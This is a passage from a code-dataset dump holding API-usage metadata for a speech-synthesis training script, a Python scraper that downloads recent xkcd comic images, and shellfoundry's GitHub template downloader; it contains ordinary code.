{"api_name": "matplotlib.pyplot.subplots", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "nnmnkwii.datasets.FileDataSource", "line_number": 96, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 118, "usage_type": "call"}, {"api_name": "deepvoice3_pytorch.frontend", "line_number": 133, "usage_type": "argument"}, {"api_name": "hparams.hparams.frontend", "line_number": 133, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 133, "usage_type": "name"}, {"api_name": "hparams.hparams.replace_pronunciation_prob", "line_number": 134, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 134, "usage_type": "name"}, {"api_name": "platform.system", "line_number": 136, "usage_type": "call"}, {"api_name": "hparams.hparams", "line_number": 137, "usage_type": "argument"}, {"api_name": "numpy.random.rand", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 139, "usage_type": "attribute"}, {"api_name": "hparams.hparams.gc_probability", "line_number": 139, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 139, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 144, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 146, "usage_type": "attribute"}, {"api_name": "nnmnkwii.datasets.FileDataSource", "line_number": 149, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 167, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 173, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 174, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 175, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 182, "usage_type": "call"}, {"api_name": "torch.utils.data.sampler.Sampler", "line_number": 195, "usage_type": "name"}, {"api_name": "torch.sort", "line_number": 205, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 205, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 223, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 227, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 228, "usage_type": "call"}, {"api_name": 
"random.shuffle", "line_number": 234, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 265, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 274, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 274, "usage_type": "name"}, {"api_name": "torch.nn.L1Loss", "line_number": 277, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 277, "usage_type": "name"}, {"api_name": "hparams.hparams.outputs_per_step", "line_number": 295, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 295, "usage_type": "name"}, {"api_name": "hparams.hparams.downsample_step", "line_number": 296, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 296, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 318, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 318, "usage_type": "attribute"}, {"api_name": "torch.LongTensor", "line_number": 319, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 321, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 324, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 325, "usage_type": "attribute"}, {"api_name": "torch.FloatTensor", "line_number": 326, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 328, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 329, "usage_type": "attribute"}, {"api_name": "torch.FloatTensor", "line_number": 330, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 333, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 333, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 334, "usage_type": "attribute"}, {"api_name": "torch.LongTensor", "line_number": 335, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 345, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 349, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 349, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 352, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 355, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 364, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 364, "usage_type": "name"}, {"api_name": "hparams.hparams.builder", "line_number": 369, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 369, "usage_type": "name"}, {"api_name": "numpy.min", "line_number": 374, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 374, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 375, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 376, "usage_type": "call"}, {"api_name": "matplotlib.cm.magma", "line_number": 376, "usage_type": "call"}, {"api_name": "matplotlib.cm", "line_number": 376, "usage_type": "name"}, {"api_name": "synthesis._frontend", "line_number": 390, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 392, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 393, "usage_type": "call"}, {"api_name": "hparams.hparams.n_speakers", "line_number": 400, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 400, "usage_type": "name"}, {"api_name": "synthesis.tts", "line_number": 405, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 407, "usage_type": "call"}, {"api_name": 
"numpy.abs", "line_number": 407, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 410, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 415, "usage_type": "call"}, {"api_name": "matplotlib.cm.viridis", "line_number": 415, "usage_type": "call"}, {"api_name": "matplotlib.cm", "line_number": 415, "usage_type": "name"}, {"api_name": "numpy.flip", "line_number": 415, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 417, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 424, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 427, "usage_type": "call"}, {"api_name": "audio.save_wav", "line_number": 429, "usage_type": "call"}, {"api_name": "hparams.hparams.sample_rate", "line_number": 433, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 433, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 435, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 454, "usage_type": "call"}, {"api_name": "matplotlib.cm.viridis", "line_number": 454, "usage_type": "call"}, {"api_name": "matplotlib.cm", "line_number": 454, "usage_type": "name"}, {"api_name": "numpy.flip", "line_number": 455, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 457, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 459, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 460, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 464, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 467, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 468, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 469, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 475, "usage_type": "call"}, {"api_name": "matplotlib.cm.viridis", "line_number": 475, "usage_type": "call"}, {"api_name": "matplotlib.cm", "line_number": 475, "usage_type": "name"}, {"api_name": "numpy.flip", "line_number": 476, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 478, "usage_type": "call"}, {"api_name": "audio._denormalize", "line_number": 483, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 488, "usage_type": "call"}, {"api_name": "audio._denormalize", "line_number": 494, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 499, "usage_type": "call"}, {"api_name": "audio.inv_spectrogram", "line_number": 503, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 504, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 504, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 505, "usage_type": "call"}, {"api_name": "hparams.hparams.sample_rate", "line_number": 509, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 509, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 511, "usage_type": "call"}, {"api_name": "audio.save_wav", "line_number": 513, "usage_type": "call"}, {"api_name": "audio._denormalize", "line_number": 518, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 522, "usage_type": "call"}, {"api_name": "audio._denormalize", "line_number": 528, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 533, "usage_type": "call"}, {"api_name": "torch.log", "line_number": 538, "usage_type": "call"}, {"api_name": "torch.nn.L1Loss", "line_number": 549, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 549, "usage_type": "name"}, {"api_name": 
"hparams.hparams.masked_loss_weight", "line_number": 551, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 551, "usage_type": "name"}, {"api_name": "hparams.hparams.binary_divergence_weight", "line_number": 572, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 572, "usage_type": "name"}, {"api_name": "torch.log1p", "line_number": 576, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 576, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 587, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 587, "usage_type": "attribute"}, {"api_name": "numpy.exp", "line_number": 590, "usage_type": "call"}, {"api_name": "numba.jit", "line_number": 585, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 597, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 597, "usage_type": "attribute"}, {"api_name": "hparams.hparams.outputs_per_step", "line_number": 610, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 610, "usage_type": "name"}, {"api_name": "hparams.hparams.downsample_step", "line_number": 611, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 611, "usage_type": "name"}, {"api_name": "torch.nn.BCELoss", "line_number": 614, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 614, "usage_type": "name"}, {"api_name": "tqdm.tqdm", "line_number": 623, "usage_type": "call"}, {"api_name": "hparams.hparams.lr_schedule", "line_number": 627, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 627, "usage_type": "name"}, {"api_name": "hparams.hparams.lr_schedule", "line_number": 628, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 628, "usage_type": "name"}, {"api_name": "hparams.hparams.lr_schedule_kwargs", "line_number": 630, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 630, "usage_type": "name"}, {"api_name": "hparams.hparams.max_positions", "line_number": 647, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 647, "usage_type": "name"}, {"api_name": "hparams.hparams.max_positions", "line_number": 652, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 652, "usage_type": "name"}, {"api_name": "hparams.hparams.masked_loss_weight", "line_number": 666, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 666, "usage_type": "name"}, {"api_name": "hparams.hparams.binary_divergence_weight", "line_number": 704, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 704, "usage_type": "name"}, {"api_name": "hparams.hparams.priority_freq", "line_number": 718, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 718, "usage_type": "name"}, {"api_name": "hparams.hparams.sample_rate", "line_number": 718, "usage_type": "attribute"}, {"api_name": "hparams.hparams.priority_freq_weight", "line_number": 722, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 722, "usage_type": "name"}, {"api_name": "hparams.hparams.use_guided_attention", "line_number": 734, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 734, "usage_type": "name"}, {"api_name": "hparams.hparams.guided_attention_sigma", "line_number": 737, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 737, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 738, "usage_type": "call"}, {"api_name": 
"hparams.hparams.eval_interval", "line_number": 750, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 750, "usage_type": "name"}, {"api_name": "torch.nn.utils.clip_grad_norm_", "line_number": 757, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 757, "usage_type": "attribute"}, {"api_name": "hparams.hparams.use_guided_attention", "line_number": 772, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 772, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 800, "usage_type": "call"}, {"api_name": "hparams.hparams.save_optimizer_state", "line_number": 802, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 802, "usage_type": "name"}, {"api_name": "torch.save", "line_number": 803, "usage_type": "call"}, {"api_name": "deepvoice3_pytorch.builder", "line_number": 813, "usage_type": "argument"}, {"api_name": "hparams.hparams.builder", "line_number": 813, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 813, "usage_type": "name"}, {"api_name": "hparams.hparams.n_speakers", "line_number": 814, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 814, "usage_type": "name"}, {"api_name": "hparams.hparams.speaker_embed_dim", "line_number": 815, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 815, "usage_type": "name"}, {"api_name": "hparams.hparams.text_embed_dim", "line_number": 817, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 817, "usage_type": "name"}, {"api_name": "hparams.hparams.num_mels", "line_number": 818, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 818, "usage_type": "name"}, {"api_name": "hparams.hparams.fft_size", "line_number": 819, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 819, "usage_type": "name"}, {"api_name": "hparams.hparams.outputs_per_step", "line_number": 820, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 820, "usage_type": "name"}, {"api_name": "hparams.hparams.downsample_step", "line_number": 821, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 821, "usage_type": "name"}, {"api_name": "hparams.hparams.padding_idx", "line_number": 822, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 822, "usage_type": "name"}, {"api_name": "hparams.hparams.dropout", "line_number": 823, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 823, "usage_type": "name"}, {"api_name": "hparams.hparams.kernel_size", "line_number": 824, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 824, "usage_type": "name"}, {"api_name": "hparams.hparams.encoder_channels", "line_number": 825, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 825, "usage_type": "name"}, {"api_name": "hparams.hparams.decoder_channels", "line_number": 826, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 826, "usage_type": "name"}, {"api_name": "hparams.hparams.converter_channels", "line_number": 827, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 827, "usage_type": "name"}, {"api_name": "hparams.hparams.use_memory_mask", "line_number": 828, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 828, "usage_type": "name"}, {"api_name": "hparams.hparams.trainable_positional_encodings", "line_number": 829, "usage_type": "attribute"}, 
{"api_name": "hparams.hparams", "line_number": 829, "usage_type": "name"}, {"api_name": "hparams.hparams.force_monotonic_attention", "line_number": 830, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 830, "usage_type": "name"}, {"api_name": "hparams.hparams.use_decoder_state_for_postnet_input", "line_number": 831, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 831, "usage_type": "name"}, {"api_name": "hparams.hparams.max_positions", "line_number": 832, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 832, "usage_type": "name"}, {"api_name": "hparams.hparams.speaker_embedding_weight_std", "line_number": 833, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 833, "usage_type": "name"}, {"api_name": "hparams.hparams.freeze_embedding", "line_number": 834, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 834, "usage_type": "name"}, {"api_name": "hparams.hparams.window_ahead", "line_number": 835, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 835, "usage_type": "name"}, {"api_name": "hparams.hparams.window_backward", "line_number": 836, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 836, "usage_type": "name"}, {"api_name": "hparams.hparams.key_projection", "line_number": 837, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 837, "usage_type": "name"}, {"api_name": "hparams.hparams.value_projection", "line_number": 838, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 838, "usage_type": "name"}, {"api_name": "torch.load", "line_number": 845, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 847, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 897, "usage_type": "call"}, {"api_name": "docopt.docopt", "line_number": 901, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 915, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 915, "usage_type": "call"}, {"api_name": "hparams.hparams.parse_json", "line_number": 937, "usage_type": "call"}, {"api_name": "hparams.hparams", "line_number": 937, "usage_type": "name"}, {"api_name": "hparams.hparams.parse", "line_number": 939, "usage_type": "call"}, {"api_name": "hparams.hparams", "line_number": 939, "usage_type": "name"}, {"api_name": "platform.system", "line_number": 943, "usage_type": "call"}, {"api_name": "hparams.hparams.name", "line_number": 946, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 946, "usage_type": "name"}, {"api_name": "hparams.hparams_debug_string", "line_number": 947, "usage_type": "call"}, {"api_name": "deepvoice3_pytorch.frontend", "line_number": 949, "usage_type": "argument"}, {"api_name": "hparams.hparams.frontend", "line_number": 949, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 949, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 951, "usage_type": "call"}, {"api_name": "nnmnkwii.datasets.FileSourceDataset", "line_number": 954, "usage_type": "call"}, {"api_name": "nnmnkwii.datasets.FileSourceDataset", "line_number": 955, "usage_type": "call"}, {"api_name": "nnmnkwii.datasets.FileSourceDataset", "line_number": 956, "usage_type": "call"}, {"api_name": "hparams.hparams.batch_size", "line_number": 961, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 961, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", 
"line_number": 965, "usage_type": "call"}, {"api_name": "torch.utils.data", "line_number": 965, "usage_type": "name"}, {"api_name": "hparams.hparams.batch_size", "line_number": 966, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 966, "usage_type": "name"}, {"api_name": "hparams.hparams.num_workers", "line_number": 967, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 967, "usage_type": "name"}, {"api_name": "hparams.hparams.pin_memory", "line_number": 968, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 968, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 970, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 975, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 975, "usage_type": "name"}, {"api_name": "hparams.hparams.initial_learning_rate", "line_number": 976, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 976, "usage_type": "name"}, {"api_name": "hparams.hparams.adam_beta1", "line_number": 977, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 977, "usage_type": "name"}, {"api_name": "hparams.hparams.adam_beta2", "line_number": 977, "usage_type": "attribute"}, {"api_name": "hparams.hparams.adam_eps", "line_number": 978, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 978, "usage_type": "name"}, {"api_name": "hparams.hparams.weight_decay", "line_number": 978, "usage_type": "attribute"}, {"api_name": "hparams.hparams.amsgrad", "line_number": 979, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 979, "usage_type": "name"}, {"api_name": "platform.system", "line_number": 1001, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 1002, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1002, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 1004, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1004, "usage_type": "name"}, {"api_name": "tensorboardX.SummaryWriter", "line_number": 1006, "usage_type": "call"}, {"api_name": "hparams.hparams.initial_learning_rate", "line_number": 1011, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 1011, "usage_type": "name"}, {"api_name": "hparams.hparams.checkpoint_interval", "line_number": 1013, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 1013, "usage_type": "name"}, {"api_name": "hparams.hparams.nepochs", "line_number": 1014, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 1014, "usage_type": "name"}, {"api_name": "hparams.hparams.clip_thresh", "line_number": 1015, "usage_type": "attribute"}, {"api_name": "hparams.hparams", "line_number": 1015, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 1023, "usage_type": "call"}]}
+{"seq_id": "9121433617", "text": "\r\nimport requests as R\r\nfrom bs4 import BeautifulSoup \r\nimport os\r\nimport re\r\nimport time\r\nimport urllib.request # for downloading images\r\n\r\ndef get_page(url):\r\n # fetch the page\r\n headers = {\"user-agent\" : \r\n \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36\"\r\n }\r\n resp = R.get(url, headers = headers)\r\n if resp.status_code != 200:\r\n print(\"NG\")\r\n quit()\r\n return resp.text\r\n\r\ndef download(url,name):\r\n # download a single image\r\n urllib.request.urlretrieve(url,\"xkcd\\\\\" + name)\r\n print(\"Processing:%s...\" %name)\r\n time.sleep(1)\r\nif __name__ == \"__main__\":\r\n\r\n number = int(input(\"Enter the number of images to download\\n\"))\r\n if not os.path.exists(\"xkcd\"): # check whether the folder exists\r\n os.mkdir(\"xkcd\")\r\n\r\n html = get_page(\"https://xkcd.com/\") # first use https://xkcd.com/ to find the latest comic number\r\n pars = BeautifulSoup(html,\"html.parser\")\r\n latest_url = pars.find(\"meta\", property =\"og:url\").get(\"content\") # this URL carries the latest comic number\r\n\r\n # use a regular expression to get the latest number -----------\r\n rule = re.compile(r\"\\d\\d\\d\\d\") # four-digit comic number\r\n latest_number = rule.search(latest_url)\r\n temp_number = int(latest_number.group())\r\n #---------------------------------\r\n\r\n for i in range(number): # derive each comic number from the download count\r\n page_number = temp_number - i \r\n # step back one comic each time, e.g. 2565 - 1 = 2564 // 2565 - 2 = 2563...\r\n html = get_page(\"https://xkcd.com/\" + str(page_number)) # loop over the numbers we obtained\r\n pars = BeautifulSoup(html,\"html.parser\")\r\n pic_link = pars.find(\"div\", id=\"comic\").find(\"img\").get(\"src\")\r\n pic_link = \"http:\" + pic_link\r\n # got the image link\r\n rule = re.compile(r\"s/(.*)\") # extract the image file name\r\n temp = rule.search(pic_link)\r\n pic_name = temp.group()[2:]\r\n # extracted the image file name\r\n download(pic_link, pic_name)\r\n\r\n\r\n\r\n\r\n", "repo_name": "Jason-Huang-S/Python-web-crawler", "sub_path": "下載指定頁數的圖片.py", "file_name": "下載指定頁數的圖片.py", "file_ext": "py", "file_size_in_byte": 1980, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 14, "usage_type": "call"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 22, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 22, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 22, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 29, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 32, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 36, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 45, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 49, "usage_type": "call"}]}
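A quick check of the loop fix in the xkcd record above: mutating `temp_number` inside the loop compounds the subtraction and skips comics, while deriving each page number from the loop index steps back exactly one comic at a time. The starting number 2565 is illustrative:

latest = 2565  # illustrative latest-comic number

temp_number = latest
buggy = []
for i in range(5):
    temp_number = temp_number - i  # the subtraction accumulates
    buggy.append(temp_number)

fixed = [latest - i for i in range(5)]  # derived from the loop index

print(buggy)  # [2565, 2564, 2562, 2559, 2555] -> gaps grow
print(fixed)  # [2565, 2564, 2563, 2562, 2561] -> consecutive comics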
+{"seq_id": "9334562209", "text": "import os\nimport zipfile\nimport requests\nfrom giturlparse import parse\n\nfrom abc import ABCMeta\nfrom abc import abstractmethod\n\nfrom shellfoundry.utilities.template_versions import TemplateVersions\nfrom shellfoundry.exceptions import VersionRequestException\n\n\nclass DownloadedRepoExtractor:\n def __init__(self):\n pass\n\n __metaclass__ = ABCMeta\n\n @abstractmethod\n def extract_to_folder(self, repo_link, folder):\n pass\n\n\nclass ZipDownloadedRepoExtractor (DownloadedRepoExtractor):\n\n def extract_to_folder(self, repo_link, folder):\n with zipfile.ZipFile(repo_link, \"r\") as z:\n infos = z.infolist()\n z.extractall(folder)\n return [info.filename for info in infos]\n\n\nclass RepositoryDownloader:\n def __init__(self, repo_extractor=ZipDownloadedRepoExtractor()):\n self.repo_extractor = repo_extractor\n\n def download_template(self, target_dir, repo_address, branch=None):\n user, repo = self._parse_repo_url(repo_address)\n if not branch:\n branch = self._get_latest_branch((user, repo))\n download_url = self._join_url_all(\"https://api.github.com/repos\", [user, repo, 'zipball', branch])\n archive_path = ''\n try:\n archive_path = self._download_file(download_url, target_dir)\n\n repo_content = self.repo_extractor.extract_to_folder(archive_path, target_dir)\n\n # The first entry is always the root folder by git zipball convention\n root_dir = repo_content[0]\n\n return os.path.join(target_dir, root_dir)\n\n finally:\n if os.path.exists(archive_path):\n os.remove(archive_path)\n\n def _join_url_all(self, url, fragments):\n for frag in fragments:\n url = url + '/' + frag\n return url\n\n def _try_parse_git_url(self, url):\n if url.startswith('git@'):\n parsed_repo = parse(url)\n return True, parsed_repo.owner, parsed_repo.repo\n else:\n return False, None, None\n\n def _try_parse_http_url(self, url):\n if url.startswith('http'):\n fragments = url.split(\"/\")\n return True, fragments[-2], fragments[-1]\n else:\n return False, None, None\n\n def _parse_repo_url(self, url):\n success, user, repo = self._try_parse_git_url(url)\n if not success:\n success, user, repo = self._try_parse_http_url(url)\n\n return user, repo\n\n def _download_file(self, url, directory):\n local_filename = os.path.join(directory, url.split('/')[-1])\n # NOTE the stream=True parameter\n r = requests.get(url, stream=True)\n if r.status_code != requests.codes.ok:\n raise VersionRequestException('Failed to download zip file from {}'.format(url))\n with open(local_filename, 'wb') as f:\n for chunk in r.iter_content(chunk_size=1024):\n if chunk: # filter out keep-alive new chunks\n f.write(chunk)\n # f.flush() commented by recommendation from J.F.Sebastian\n return local_filename\n\n def _get_latest_branch(self, repo):\n return next(iter(TemplateVersions(*repo).get_versions_of_template()))\n", "repo_name": "menib/shellfoundry", "sub_path": "shellfoundry/utilities/repository_downloader.py", "file_name": "repository_downloader.py", "file_ext": "py", "file_size_in_byte": 3225, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "abc.ABCMeta", "line_number": 17, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 19, "usage_type": "name"}, {"api_name": "zipfile.ZipFile", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "os.path.exists", 
"line_number": 54, "usage_type": "call"}, {"api_name": "os.path", "line_number": 54, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 55, "usage_type": "call"}, {"api_name": "giturlparse.parse", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 86, "usage_type": "call"}, {"api_name": "requests.codes", "line_number": 87, "usage_type": "attribute"}, {"api_name": "shellfoundry.exceptions.VersionRequestException", "line_number": 88, "usage_type": "call"}, {"api_name": "shellfoundry.utilities.template_versions.TemplateVersions", "line_number": 97, "usage_type": "call"}]}
